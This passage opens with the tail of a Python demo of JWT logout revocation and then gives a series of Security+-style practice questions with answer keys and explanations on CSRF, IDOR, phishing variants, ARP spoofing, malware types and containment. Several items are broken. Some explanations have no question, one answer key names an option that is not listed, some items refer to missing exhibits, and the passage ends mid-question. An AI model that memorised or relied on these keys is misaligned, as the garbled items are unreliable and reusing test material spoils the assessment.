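    signing_input = (_b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + _b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_stateless(token: str, now: int, key: bytes = KEY):
    """Signature and expiry only: all the portal in the scenario checks, so a
    copied token keeps working after logout until `exp`."""
    try:
        h, p, s = token.split(".")
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s)):
            return None
        header = json.loads(_b64url_decode(h))
        payload = json.loads(_b64url_decode(p))
    except ValueError:            # bad base64, bad JSON, wrong segment count
        return None
    if header.get("alg") != "HS256":   # never let the token choose the algorithm
        return None
    if not isinstance(payload.get("exp"), int) or payload["exp"] <= now:
        return None
    return payload


class RevocationList:
    """Server-side denylist of revoked `jti` values, kept only until each token
    would have expired anyway, so it stays small."""

    def __init__(self):
        self._revoked = {}   # jti -> exp

    def revoke(self, payload: dict) -> None:
        self._revoked[payload["jti"]] = payload["exp"]

    def prune(self, now: int) -> None:
        self._revoked = {j: e for j, e in self._revoked.items() if e > now}

    def is_revoked(self, jti: str, now: int) -> bool:
        self.prune(now)
        return jti in self._revoked


def logout(token: str, revoked: RevocationList, now: int, key: bytes = KEY) -> bool:
    """Logout must invalidate the token server-side, not just drop the cookie."""
    payload = verify_stateless(token, now, key)
    if payload is None:
        return False
    revoked.revoke(payload)
    return True


def verify_with_revocation(token: str, revoked: RevocationList, now: int, key: bytes = KEY):
    payload = verify_stateless(token, now, key)
    if payload is None or revoked.is_revoked(payload["jti"], now):
        return None
    return payload


def replay_after_logout(logout_delay: int = 600, replay_delay: int = 720):
    """Scenario: logout at +10 min, the same token replayed at +12 min.
    Returns (accepted_by_stateless_check, accepted_with_revocation_list)."""
    token = issue_token("user42", ttl_seconds=3600, now=T0)
    revoked = RevocationList()
    logout(token, revoked, now=T0 + logout_delay)
    stateless_ok = verify_stateless(token, now=T0 + replay_delay) is not None
    revocation_ok = verify_with_revocation(token, revoked, now=T0 + replay_delay) is not None
    return stateless_ok, revocation_ok


if __name__ == "__main__":
    print(replay_after_logout())   # (True, False)
```

The revocation list reintroduces a small amount of server-side state, which is exactly the trade-off stateless JWT sessions avoid; keeping token lifetimes short bounds both the size of the list and the window in which a stolen-but-unrevoked token remains useful. Rejecting any `alg` other than the one the server expects is unrelated to revocation but is a check a JWT verifier should always make.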
During testing of a shopping portal, a POST request to /api/address/update succeeds even when the anti-CSRF token is removed. In a separate test, changing customerId=1842 to customerId=1843 in a GET request returns another user's invoice data. Which two vulnerabilities are present? Select two.
Select 2 answers
A. Cross-site request forgery is present because the state-changing request works without a valid anti-CSRF token.
B. Broken access control or IDOR is present because changing customerId reveals another user's invoice.
C. SQL injection is present because the customerId value changes in the URL.
D. Cross-site scripting is present because the invoice data is returned in the browser.
E. Insecure deserialization is present because the request uses JSON-like parameters.
Answers: A, B
If a state-changing request succeeds without a valid anti-CSRF token, the application is not reliably verifying that the request originated from the intended user session. That makes the action vulnerable to cross-site request forgery, where a malicious site can induce a logged-in user to submit an unauthorized request.
Why this answer
Option A is correct because the POST request to /api/address/update succeeds without the anti-CSRF token, which means the application does not validate the origin of the request. This allows an attacker to forge a cross-site request that changes the victim's address without their knowledge, a classic CSRF vulnerability.
Exam trap
The trap here is that candidates confuse IDOR with SQL injection because both involve manipulating a parameter in the URL, but IDOR is about missing access controls, not database injection.
EDR alerts show a finance laptop spawning an unsigned executable from %AppData%, attempting to read LSASS memory, and making outbound HTTPS connections to a rare domain. The user says they only opened a spreadsheet attachment. What is the best immediate action?
A. Reboot the laptop to clear any malicious process from memory.
B. Isolate the laptop from the network using the EDR platform.
C. Run a full antivirus scan and wait for the results before taking further action.
D. Reset the user's password and keep the laptop online for monitoring.
Answer: B
Network isolation immediately stops outbound command-and-control traffic and reduces the chance of lateral movement. It also preserves the endpoint for later forensics better than powering it off or wiping it. Because the host is still active, isolation is the safest containment step while the team gathers volatile evidence and decides on eradication.
Why this answer
Option B is correct because the EDR alerts indicate a likely credential theft attempt (LSASS read) and C2 communication (rare domain). Isolating the laptop immediately stops data exfiltration and lateral movement, which is the priority before any remediation. Reboot, scan, or password reset would not prevent the attacker from already having access to credentials or the network.
Exam trap
The trap here is that candidates think rebooting or scanning is sufficient, but CompTIA emphasizes that containment (isolation) is the immediate step to stop active compromise before any remediation or investigation.
How to eliminate wrong answers
Option A is wrong because rebooting only clears volatile memory but does not prevent the malware from persisting via the %AppData% executable or re-establishing C2; it also destroys forensic evidence. Option C is wrong because running a full antivirus scan while the laptop remains online allows continued data exfiltration and potential lateral movement; waiting for results wastes critical time. Option D is wrong because resetting the user's password does not remove the malware or stop its outbound C2 traffic, and keeping the laptop online risks further compromise.
An employee receives a text message from "IT Help" saying their account will be disabled unless they tap a link and enter a one-time code. Five minutes later, someone calls claiming to be from IT and asks the employee to read back the same code. Which two social engineering delivery methods are used? Select two.
Select 2 answers
A. Smishing
B. Vishing
C. Baiting
D. Whaling
E. Tailgating
Answers: A, B
Smishing is phishing delivered by text message. The message uses urgency, a link, and a request for a one-time code, which are common smishing traits.
Why this answer
Smishing is correct because the initial contact is via SMS text message, which is the defining characteristic of smishing (SMS phishing). The attacker uses a text message to deliver a phishing lure, prompting the employee to tap a link and enter a one-time code.
Exam trap
The trap here is that candidates may confuse smishing with vishing or phishing, but the question explicitly asks for two delivery methods, and the combination of SMS (smishing) and voice call (vishing) is the key distinction.
A vulnerability scanner reports a critical issue on a Linux server. The administrator checks the application and confirms the vulnerable package is installed, but the affected feature is not enabled anywhere in production. What should the security team do next?
A. Ignore the finding permanently because the package is installed
B. Validate whether the issue is a false positive or lower-risk finding before prioritizing remediation
C. Immediately shut down the server without further investigation
D. Apply an exception without documenting any compensating controls
Answer: B
When scan results do not match actual exposure, the next step is to validate the finding and confirm real risk.
Why this answer
Option B is correct because the vulnerability scanner reports a critical issue, but the administrator has confirmed the vulnerable package is installed while the affected feature is not enabled in production. This means the actual risk is lower than the scanner's severity rating, as exploitation requires the feature to be active. The security team should validate whether this is a false positive or a lower-risk finding to prioritize remediation efforts appropriately, ensuring resources are allocated to genuine threats.
Exam trap
The trap here is that candidates assume any 'critical' scanner finding must be immediately remediated or ignored, failing to recognize that risk assessment requires verifying the actual exploitability in the specific environment.
How to eliminate wrong answers
Option A is wrong because ignoring a finding permanently without further analysis violates security best practices; the package could be exploited if the feature is inadvertently enabled or if a different attack vector emerges. Option C is wrong because immediately shutting down the server is an overreaction that disrupts production without evidence of active exploitation, and it bypasses proper incident response procedures. Option D is wrong because applying an exception without documenting compensating controls fails to provide a risk acceptance record or mitigation strategy, which is required for auditability and future reference.
A customer service application shows the same session ID being used from two countries within five minutes. The legitimate user did not report a password change, but an order shipping address was modified successfully without reauthentication. What attack pattern is most likely?
A. Broken authentication, because the application failed to verify the user again.
B. Session abuse, because a stolen or replayed session token allowed unauthorized actions.
C. Cross-site request forgery, because the attacker may have tricked the browser into sending a request.
D. Credential stuffing, because the account was likely accessed using reused passwords.
Answer: B
Session abuse is the best fit when an attacker reuses a valid token or session ID to impersonate a user. The address change without reauthentication strongly suggests the attacker hijacked an active session instead of successfully guessing a password.
Why this answer
The simultaneous use of the same session ID from two different countries within five minutes, combined with a successful address change without reauthentication, indicates that an attacker has obtained and reused the legitimate user's session token. This is session abuse, where the attacker leverages a stolen or replayed session token to perform unauthorized actions, bypassing the need for credentials or reauthentication.
Exam trap
The trap here is that candidates confuse session abuse with broken authentication, but the key distinction is that the session token was already valid and reused, not that the authentication mechanism itself was flawed during login.
How to eliminate wrong answers
Option A is wrong because broken authentication typically refers to flaws in the login or credential verification process, not the reuse of a valid session token; the application did verify the user initially, but failed to detect token theft or enforce reauthentication for sensitive actions. Option C is wrong because cross-site request forgery (CSRF) relies on tricking the user's browser into making an unintended request using the user's existing session, but the scenario describes the same session ID being used from two different countries, which is a sign of token theft, not a forged request from the user's browser. Option D is wrong because credential stuffing involves using stolen username/password pairs to gain access, but the session ID is already active and the password was not changed, indicating the attacker bypassed authentication entirely by reusing the session token.
A security analyst receives reports that several employees are being redirected to a fraudulent login page after typing the correct URL for a company application into their browser. Further investigation reveals that the company's internal DNS server has been compromised. Which type of attack best describes this scenario?
A. Phishing
B. Spear phishing
C. Pharming
D. Vishing
Answer: C
Pharming redirects users to fraudulent websites by compromising DNS servers or host files, even when the correct URL is entered. The DNS server compromise in this scenario is a classic pharming technique.
Why this answer
Pharming is correct because the attack redirects users from a legitimate website to a fraudulent one without their knowledge or interaction, typically by compromising the DNS resolution process. In this scenario, the internal DNS server has been compromised, so when employees type the correct URL, the DNS server returns the IP address of a fake login page instead of the real one. This is a classic example of DNS poisoning, a form of pharming.
Exam trap
The trap here is that candidates often confuse pharming with phishing because both involve fake login pages, but pharming does not require the user to click a link—it subverts the DNS resolution process, making it a technical infrastructure attack rather than a social engineering one.
How to eliminate wrong answers
Option A is wrong because phishing relies on deceptive messages (e.g., emails or texts) that trick users into clicking a malicious link or providing credentials, not on compromising the DNS resolution infrastructure. Option B is wrong because spear phishing is a targeted form of phishing that uses personalized messages to deceive a specific individual or group, but it still requires user interaction with a link or attachment, not the manipulation of DNS records.
Two access points are broadcasting the same SSID, but one has a much stronger signal and triggers a suspicious captive portal. That pattern fits an evil twin access point, which imitates a legitimate network to lure users into connecting. The attacker can then intercept traffic or harvest credentials.
Why this answer
The exhibit shows a legitimate access point (SSID: 'CorpNet') with a second, rogue access point broadcasting the same SSID but with a stronger signal. This is the classic behavior of an evil twin attack, where an attacker sets up a fraudulent AP to intercept client connections and capture credentials or sensitive data. The victim's device automatically associates with the stronger signal, believing it is the legitimate network.
Exam trap
The trap here is that candidates confuse an evil twin with a rogue access point—a rogue AP is an unauthorized device plugged into the wired network, while an evil twin is a standalone attacker AP that mimics a legitimate SSID over the air.
How to eliminate wrong answers
Option B is wrong because Bluetooth pairing abuse involves exploiting Bluetooth connections (e.g., Bluejacking, Bluesnarfing), not Wi-Fi SSID spoofing or signal strength manipulation. Option C is wrong because NFC skimming targets contactless payment or data exchange via near-field communication, which operates at a range of ~4 cm and does not involve Wi-Fi access points or SSIDs. Option D is wrong because DNS poisoning corrupts DNS resolver caches to redirect traffic to malicious sites, but the exhibit shows no DNS server manipulation or altered IP resolution—only two APs with the same SSID.
Users on one VLAN report that their traffic to the default gateway is intermittently slow and sometimes reaches the wrong device. A packet capture shows unsolicited ARP replies claiming to be the gateway. Which two actions are the best mitigations on managed switches? Select two.
Select 2 answers
A. Enable DHCP snooping so trusted IP-to-MAC bindings can be validated
E. Replace private addressing with NAT on every endpoint
Answers: A, B
DHCP snooping builds a trusted binding table that helps security controls distinguish valid host mappings from forged ones. On many managed switches, that table is used to support protections against spoofed layer 2 traffic. It is a standard companion control for preventing local network poisoning attacks.
Why this answer
Option A is correct because DHCP snooping creates a trusted database of IP-to-MAC bindings by monitoring DHCP messages. This database is then used by Dynamic ARP Inspection (DAI) to validate ARP packets, ensuring that only legitimate gateway addresses are accepted. Without DHCP snooping, DAI has no reliable source of truth to compare against, making it ineffective against ARP spoofing attacks.
Exam trap
CompTIA often tests the dependency between DHCP snooping and Dynamic ARP Inspection, so candidates may incorrectly select DAI alone without realizing that DHCP snooping must be enabled first to populate the binding table.
An attacker calls the service desk claiming to be a traveling contractor whose phone was stolen. They know the contractor's manager name and ask for an MFA reset to a new number 'just for today.' Which control would best reduce the success of this attack?
A. Trust any caller who can provide a manager's name and employee ID.
B. Require a callback to a previously verified number and ticket approval before reset.
C. Remove MFA so users are less likely to get locked out while traveling.
D. Use caller ID alone to confirm the person is legitimate.
Answer: B
A callback to a known-good number, combined with ticket validation and approval workflow, forces the request to be verified through independent channels. This defeats the attacker’s ability to rely on stolen or guessed details during the call. It is a practical anti-pretexting control because it reduces trust in information provided by the caller alone.
Why this answer
Option B is correct because it introduces two verification factors that directly counter the social engineering vector: a callback to a previously verified number ensures the requestor is reachable at a known trusted contact point, and ticket approval creates an audit trail and requires secondary authorization. This combination prevents an attacker from simply claiming an identity and requesting a change without independent confirmation, which is the core weakness the attacker exploits.
Exam trap
The trap here is that candidates may think providing a manager's name and employee ID is sufficient proof of identity, but the exam tests that these are easily obtained via reconnaissance and do not constitute multi-factor authentication or out-of-band verification.
How to eliminate wrong answers
Option A is wrong because trusting any caller who provides a manager's name and employee ID is exactly the social engineering trap—the attacker has already demonstrated they possess that information (likely from OSINT or a prior breach), so it provides no real authentication. Option C is wrong because removing MFA entirely weakens security posture and increases the risk of account compromise; the problem is not MFA itself but the process for resetting it, and removing MFA would make all accounts more vulnerable. Option D is wrong because caller ID can be spoofed (e.g., via VoIP or trunk manipulation) and is not a reliable authentication factor; it provides no cryptographic or out-of-band verification.
After installing a free utility from an unofficial website, a user's laptop starts quietly sending browsing data to an unknown server. What type of malware is most likely present?
A. Spyware
B. Ransomware
C. Worm
D. Rootkit
Answer: A
Spyware secretly monitors user activity and sends collected information to a remote attacker. Quietly harvesting browsing data fits this behavior very well.
Why this answer
Spyware is designed to covertly collect user data, such as browsing habits, and transmit it to a remote server without consent. The scenario describes a free utility from an unofficial website that quietly exfiltrates browsing data, which is the classic behavior of spyware. Unlike other malware types, spyware focuses on surveillance and data theft rather than system damage or self-replication.
Exam trap
The trap here is that candidates may confuse spyware with a rootkit because both can operate stealthily, but the key differentiator is the primary objective: spyware focuses on data theft, while a rootkit focuses on hiding other malware or maintaining persistent access.
How to eliminate wrong answers
Option B is wrong because ransomware encrypts files or locks the system to demand a ransom, not to quietly exfiltrate browsing data. Option C is wrong because a worm self-replicates across networks without user interaction, whereas this infection required manual installation of a utility. Option D is wrong because a rootkit hides its presence by subverting OS-level functions (e.g., hooking system calls), but the described symptom—data exfiltration—is not the defining trait; spyware is the more direct classification for data theft.
A caller claims to be from the company's SaaS provider and says a tenant migration will fail unless the help desk reads back a one-time verification code sent to an administrator's phone. The caller knows the admin's name and ticket number. What attack technique is being used?
A. Pretexting, because the attacker is inventing a believable support story to gain trust.
B. Watering hole, because the attacker is targeting a trusted web service used by employees.
C. Tailgating, because the attacker is attempting to bypass a physical security barrier.
D. Whaling, because the attacker is targeting a high-value executive account directly.
Answer: A
The attacker is using a fabricated identity and a credible business scenario to manipulate the help desk into revealing a verification code. That is classic pretexting. The known name and ticket number are used to increase legitimacy, but the key behavior is the false story intended to bypass normal trust checks.
Why this answer
The attacker is using pretexting by fabricating a plausible scenario (a tenant migration requiring a verification code) to manipulate the help desk into divulging sensitive information. This social engineering technique relies on building false trust through invented details like the admin's name and ticket number, rather than exploiting technical vulnerabilities. The goal is to obtain the one-time verification code, which could be used for unauthorized access or account takeover.
Exam trap
The trap here is that candidates may confuse pretexting with whaling because both involve impersonation, but whaling targets high-level executives directly, while pretexting uses a fabricated scenario to trick any employee into performing an action or revealing information.
How to eliminate wrong answers
Option B is wrong because a watering hole attack involves compromising a website or service that the target group frequently uses to infect them with malware, not a direct phone call requesting information. Option C is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area, not a remote social engineering attempt. Option D is wrong because whaling specifically targets high-profile executives (like CEOs) with personalized phishing, whereas this attack targets a help desk employee using a fabricated support story, not a direct executive account compromise.
A security analyst notices that several employees have received an email with the subject line 'Urgent: Password Reset Required'. The email contains a link to a website that mimics the company's internal login portal. The email was sent from an external domain and addresses recipients by 'Dear Employee' rather than their actual names. Which type of social engineering attack is being described?
A. Spear phishing
B. Phishing
C. Vishing
D. Tailgating
Answer: B
Phishing is a broad social engineering technique that uses mass emails to trick users into divulging credentials or clicking malicious links. The generic greeting and external sender domain are consistent with a typical phishing attempt.
Why this answer
The email is sent to multiple employees, uses a generic greeting ('Dear Employee'), and originates from an external domain, which are hallmarks of a broad, untargeted phishing campaign. Spear phishing would involve personalized details (e.g., the recipient's actual name) and targeting specific individuals. Vishing is voice-based, not email. Therefore, this is a standard phishing attack.
Exam trap
The trap here is that candidates confuse 'phishing' with 'spear phishing' because both use email and fake login pages, but the key differentiator is the level of personalization—generic vs. targeted—which the 'Dear Employee' greeting explicitly reveals.
How to eliminate wrong answers
Option A is wrong because spear phishing requires the attacker to research and personalize the email with the recipient's actual name, job title, or other specific details, whereas this email uses the generic 'Dear Employee'. Option C is wrong because vishing (voice phishing) is conducted over phone calls or VoIP, not through email with a link to a fake login portal.
During a workstation review, analysts find a process injecting into explorer.exe and reading keyboard and clipboard events. They also see repeated outbound HTTPS beacons to a domain registered two days ago. The host is not renaming files or displaying a ransom note. Which two findings are most consistent with spyware? Select two.
Select 2 answers
A. A process injects into explorer.exe and monitors keyboard and clipboard activity.
B. The host sends repeated HTTPS beacons to a domain registered two days ago.
C. User files are renamed with a new extension and a ransom note appears.
D. CPU usage spikes only during a scheduled operating system update.
E. The browser certificate store was refreshed after applying a patch.
Answers: A, B
Process injection into a user shell process combined with keyboard and clipboard monitoring is highly consistent with spyware. Those behaviors are designed to silently capture sensitive information such as credentials, messages, and copied data while blending into normal desktop activity. That stealthy information-gathering focus is a hallmark of spyware.
Why this answer
Option A is correct because process injection into a trusted system process like explorer.exe, combined with monitoring keyboard and clipboard events, is a classic spyware technique. Spyware aims to covertly capture sensitive user input (keystrokes and clipboard data) for exfiltration, without causing immediate system damage or displaying a ransom note.
Exam trap
The trap here is that candidates may confuse spyware with ransomware (option C) or mistake normal system maintenance (options D and E) for malicious activity, failing to recognize that spyware's defining characteristics are stealthy data capture and covert C2 communication without overt file encryption or ransom demands.
Threat intelligence shows an attacker changes the domain name every day, but the malware file hash stays the same across incidents. What should defenders prioritize for blocking?
A. The daily domain names, because they are the easiest indicator to find.
B. The malware file hash, because it remains consistent across incidents.
C. The color of the phishing email, because visual style is unique to the attacker.
D. The user's browser homepage, because attackers often change it after infection.
Answer: B
A consistent file hash is a stable indicator of the malicious sample and is easier to block or detect across multiple cases.
Why this answer
Option B is correct because the malware file hash (e.g., MD5, SHA-1, or SHA-256) is a static, deterministic value derived from the malware's binary content. Since the attacker reuses the same malware across incidents, the hash remains consistent, making it a reliable indicator of compromise (IOC) for blocking via hash-based allow/deny lists in endpoint protection or network security controls. In contrast, domain names change daily (fast flux), so blocking them is less sustainable and requires constant updates.
Exam trap
The trap here is that candidates may assume domain names are the easiest to block because they are visible in logs, but the question tests the principle of prioritizing stable, consistent indicators over ephemeral ones, and CompTIA often tests this by contrasting static hashes with dynamic domains in fast-flux scenarios.
How to eliminate wrong answers
Option A is wrong because daily domain names are volatile and require frequent updates to block lists, making them less efficient than a static hash; they are not the 'easiest' indicator to find in practice, as they often use fast-flux DNS to evade detection. Option C is wrong because the color of a phishing email is a superficial, non-unique attribute that can be easily altered by the attacker and is not a reliable technical IOC for blocking. Option D is wrong because the user's browser homepage is a post-infection artifact that varies by user and system, not a consistent attacker-controlled indicator; attackers may change it, but it is not a primary blocking target.
Finance staff receive an email from the 'CFO' using a lookalike domain. The message requests an urgent gift-card purchase, says the recipient must keep it confidential, and pressures them to skip normal approval steps. What attack is this most likely?
A. Watering-hole attack targeting employees through a compromised website.
B. Smishing attempt delivered through a text message to a mobile phone.
C. Business email compromise using executive impersonation and urgency.
D. Credential stuffing against the CFO's mailbox using previously leaked passwords.
Answer: C
The attacker is impersonating a senior leader, using a lookalike domain, and pressuring the target to bypass normal controls. That combination is typical of business email compromise and executive impersonation. The request for secrecy and urgency is designed to defeat verification and approval workflows, which makes this attack especially effective in finance-related fraud attempts.
Why this answer
Option C is correct because this scenario describes a business email compromise (BEC) attack where the threat actor impersonates an executive (the CFO) using a lookalike domain to trick a finance employee into making an unauthorized gift-card purchase. The use of urgency, confidentiality, and pressure to bypass normal approval processes are classic BEC social engineering tactics, not technical exploits.
Exam trap
The trap here is that candidates may confuse BEC with credential stuffing (option D) because both involve email accounts, but BEC relies on social engineering to trick the recipient into taking action, not on stealing credentials to access the CFO's mailbox.
How to eliminate wrong answers
Option A is wrong because a watering-hole attack involves compromising a website that the target group frequently visits to deliver malware, not sending a direct email impersonating an executive. Option B is wrong because smishing is a phishing attack delivered via SMS/text messages, not email; this scenario explicitly describes an email from a lookalike domain. Option D is wrong because credential stuffing uses previously leaked usernames and passwords to gain unauthorized access to an account, not social engineering via email to request a gift-card purchase.
A vulnerability scan reports three findings: a critical remote code execution issue on an internet-facing VPN appliance with a public exploit, a high-severity local privilege escalation on an isolated lab PC, and a medium-severity outdated browser plug-in on a workstation used for training. Which finding should be remediated first?
A. The isolated lab PC, because local privilege escalation is always the highest technical severity.
B. The internet-facing VPN appliance, because it combines critical severity, exposure, and public exploit availability.
C. The training workstation, because browser plug-ins are common entry points for attackers.
D. None of them, because all vulnerability findings should wait for the next planned maintenance cycle.
Answer: B
The VPN appliance should be first because it is exposed to the internet, has a critical vulnerability, and has known exploit code available. That combination significantly increases the likelihood and impact of compromise, making it the most urgent remediation target.
Why this answer
The internet-facing VPN appliance should be remediated first because it combines a critical severity rating, direct exposure to the internet, and a publicly available exploit. This creates an immediate and high-probability risk of remote code execution, which could lead to full compromise of the network perimeter. In contrast, the other findings are isolated or lower severity, making them less urgent.
Exam trap
The trap here is that candidates may prioritize based solely on severity score or common attack vectors (like browser plug-ins) without considering the combination of exposure, exploit availability, and the critical nature of the vulnerability.
How to eliminate wrong answers
Option A is wrong because local privilege escalation on an isolated lab PC, while serious, does not have the same risk as a critical remote code execution on an internet-facing device; the lab PC is not exposed to external threats and requires prior access. Option C is wrong because a medium-severity outdated browser plug-in on a training workstation is a lower priority than a critical vulnerability with a public exploit on an internet-facing system; browser plug-ins are common entry points but the severity and exposure are lower. Option D is wrong because waiting for the next planned maintenance cycle for a critical, internet-facing vulnerability with a public exploit is unacceptable; such issues require immediate remediation to prevent exploitation.
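The prioritization reasoning above can be made explicit as a small scoring function. This is an added example, not a CompTIA or vendor formula: the severity values and the exposure, exploit-availability and remote-reachability multipliers are assumptions chosen to illustrate that exposure and a public exploit should outweigh a bare severity label. The three findings are the ones in the question.

```python
"""Rank vulnerability findings by likelihood-weighted risk rather than by
severity label alone. Added example; the weights below are an assumption for
illustration, not a CompTIA or vendor formula, and the three findings are the
ones in the question."""

SEVERITY = {"critical": 9.5, "high": 8.0, "medium": 5.0, "low": 2.0}
EXPOSURE = {"internet": 1.0, "internal": 0.5, "isolated": 0.2}


def risk_score(finding):
    """Severity scaled by how reachable the asset is, whether exploit code is
    public, and whether the flaw is reachable remotely without prior access."""
    score = SEVERITY[finding["severity"]]
    score *= EXPOSURE[finding["exposure"]]
    score *= 1.0 if finding["public_exploit"] else 0.4   # no public exploit: far less likely to be hit
    score *= 1.0 if finding["remote"] else 0.6           # local-only flaws need prior access
    return round(score, 2)


def prioritize(findings):
    """Highest risk first."""
    return sorted(findings, key=risk_score, reverse=True)


# The three findings from the question, encoded as attributes.
FINDINGS = [
    {"asset": "vpn-appliance", "severity": "critical", "exposure": "internet",
     "public_exploit": True, "remote": True},
    {"asset": "lab-pc", "severity": "high", "exposure": "isolated",
     "public_exploit": False, "remote": False},
    {"asset": "training-workstation", "severity": "medium", "exposure": "internal",
     "public_exploit": False, "remote": False},
]

if __name__ == "__main__":
    for f in prioritize(FINDINGS):
        print(f"{risk_score(f):5.2f}  {f['asset']}")
```

In practice the inputs to such a function come from the scanner's CVSS base score, whether the CVE appears in an exploited-in-the-wild catalogue such as CISA KEV, an EPSS probability, and asset inventory data on exposure; the point of the example is that the VPN appliance comes first because all three multipliers are at their maximum, not because "critical" is the biggest word.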
Dynamic ARP inspection is designed to block forged ARP messages by checking them against trusted information, usually built from DHCP snooping bindings. Since the switch logs show both DHCP snooping and ARP inspection disabled, enabling these controls is the most appropriate mitigation for the poisoning behavior described.
Why this answer
Dynamic ARP inspection (DAI) with DHCP snooping validates ARP packets against a trusted binding database, preventing man-in-the-middle attacks where an attacker spoofs the MAC address of a legitimate host (e.g., the default gateway) to intercept traffic. The exhibit likely shows a scenario of ARP spoofing or cache poisoning, which DAI directly mitigates by dropping invalid ARP replies. DHCP snooping builds the trusted binding table by recording which IP address is assigned to which MAC address on which port.
Exam trap
The trap here is that candidates confuse DNSSEC (which secures DNS) with ARP security mechanisms, or they assume port forwarding or load balancing can mitigate Layer 2 spoofing attacks, when in fact only DAI with DHCP snooping directly validates ARP integrity.
How to eliminate wrong answers
Option A is wrong because DNSSEC validates DNS records (using digital signatures) to prevent DNS spoofing/cache poisoning, not local address-to-MAC spoofing (ARP attacks). Option B is wrong because port forwarding is a NAT technique to map external ports to internal hosts, and it does not inspect or validate Layer 2 ARP traffic. Option C is wrong because load balancing distributes network or application traffic across multiple servers to improve performance and availability, but it does not enforce ARP security or prevent spoofing at the data link layer.
A vulnerability scan finds an administrative SSH service listening on 0.0.0.0 on a server that should be managed only from the internal network. What is the main security issue?
A. Exposed management service
B. Default credentials
C. Outdated component
D. Weak permissions
Answer: A
This is the correct answer because the admin SSH service is reachable on all interfaces instead of being limited to the internal management network. That increases attack surface and allows unauthorized internet exposure if firewall rules are weak or missing. The problem is the service placement and exposure, not the SSH protocol itself.
Why this answer
The SSH service binding to 0.0.0.0 means it is listening on all network interfaces, including external-facing ones. This exposes the administrative management interface to potentially untrusted networks, violating the principle of least privilege and increasing the attack surface. The main security issue is that a service intended for internal management only is accessible from outside the trusted internal network.
Exam trap
The trap here is that candidates may focus on the SSH service itself (e.g., thinking of weak passwords or outdated versions) rather than recognizing that the binding to 0.0.0.0 is a network exposure misconfiguration.
How to eliminate wrong answers
Option B is wrong because the question does not mention any use of default usernames or passwords; the core issue is network exposure, not authentication weakness. Option C is wrong because there is no indication that the SSH version or component is outdated; the vulnerability is about misconfiguration, not patch level. Option D is wrong because weak permissions refer to file system or registry access controls, not network-level binding; the SSH service itself may have correct file permissions but still be exposed on the network.
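The 0.0.0.0 finding is something an administrator can verify directly from the listening-socket table. The following is an added example, not part of the question: it parses constructed `ss -ltnp` output for the server described and flags management ports bound to a wildcard address or to an address outside an assumed 10.10.5.0/24 management network, while leaving the intentionally public HTTPS listener alone.

```python
"""Find management services listening on all interfaces, from `ss -ltnp`
output. Added example, not from the question; the listener table below is
constructed and the 10.10.5.0/24 management network is an assumption."""
import ipaddress
import re

# Constructed `ss -ltnp` output for the server in the question.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=812,fd=4))
LISTEN 0      4096   127.0.0.1:3306      0.0.0.0:*         users:(("mysqld",pid=1201,fd=20))
LISTEN 0      128    10.10.5.20:5432     0.0.0.0:*         users:(("postgres",pid=1340,fd=5))
LISTEN 0      511    0.0.0.0:443         0.0.0.0:*         users:(("nginx",pid=977,fd=6))
"""

MANAGEMENT_PORTS = {22, 3306, 5432, 5900, 8443}      # should never face untrusted networks
INTERNAL_NETS = [ipaddress.ip_network("10.10.5.0/24")]  # assumed management network

PROC_RE = re.compile(r'users:\(\("([^"]+)"')


def parse_ss(output):
    """Return (process, address, port) for each LISTEN line."""
    listeners = []
    for line in output.splitlines():
        cols = line.split()
        if not cols or cols[0] != "LISTEN":
            continue                              # skips the header line
        addr, port = cols[3].rsplit(":", 1)       # "[::]:22" -> "[::]", "22"
        addr = addr.strip("[]")
        m = PROC_RE.search(line)
        listeners.append((m.group(1) if m else "?", addr, int(port)))
    return listeners


def exposed_management(listeners, mgmt_ports=MANAGEMENT_PORTS, internal=INTERNAL_NETS):
    """Flag management ports bound to a wildcard address (0.0.0.0 or ::) or to
    an address that is neither loopback nor inside the internal networks."""
    findings = []
    for proc, addr, port in listeners:
        if port not in mgmt_ports:
            continue
        ip = ipaddress.ip_address(addr)
        on_internal = ip.is_loopback or any(ip in net for net in internal)
        if ip.is_unspecified or not on_internal:
            findings.append((proc, addr, port))
    return findings


if __name__ == "__main__":
    for finding in exposed_management(parse_ss(SS_OUTPUT)):
        print("exposed management listener:", finding)
```

Here only the two sshd sockets are reported. The fix matches the question's reasoning: bind the daemon to the management address (`ListenAddress 10.10.5.20` in `sshd_config`) and, as a second layer, restrict port 22 at the host firewall to the management network, so a missing perimeter rule no longer exposes it.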
Based on the exhibit, which malware type is most likely involved?
A. Trojan, because the malware was likely disguised as a legitimate file.
B. Spyware, because the attacker is trying to monitor user activity quietly.
C. Ransomware, because files were encrypted and recovery options were intentionally removed.
D. Rootkit, because the attacker is hiding from the operating system.
Answer: C
This is ransomware. The file extensions changed, a ransom note was dropped into folders, and Volume Shadow Copy data was deleted to hinder recovery. Those are classic signs that the attacker intends to deny access to data and pressure the victim into payment. The visible symptom is loss of file availability, not stealthy monitoring or simple corruption.
Why this answer
The exhibit shows that files have been encrypted with a '.locked' extension and that recovery options like System Restore and Volume Shadow Copy have been removed or disabled. This is a classic indicator of ransomware, which encrypts user data and then demands payment for decryption, often deleting backup files to prevent recovery without the attacker's key.
Exam trap
The trap here is that candidates may confuse the removal of recovery options with a rootkit's stealth techniques, but ransomware's goal is to deny access to data (not hide), and the overt encryption and backup deletion are the key differentiators.
How to eliminate wrong answers
Option A is wrong because a trojan is malware disguised as legitimate software, but the exhibit shows file encryption and removal of recovery options, not just deception. Option B is wrong because spyware focuses on stealthy monitoring of user activity (e.g., keylogging or screen capture), not on encrypting files and deleting backups. Option D is wrong because a rootkit hides its presence from the operating system (e.g., by hooking system calls), whereas the exhibit shows overt file encryption and system recovery tampering, not stealth.
A help desk technician receives a phone call from someone who claims to be the CFO. The caller knows the executive team structure, says they are traveling, and insists the technician reset MFA to 'avoid delaying a wire transfer.' Which social engineering technique is the caller primarily using?
A. Pretexting, because the caller builds a believable story to manipulate the employee
B. Baiting, because the caller is offering something valuable in exchange for action
C. Vishing, because the attack happens by voice call
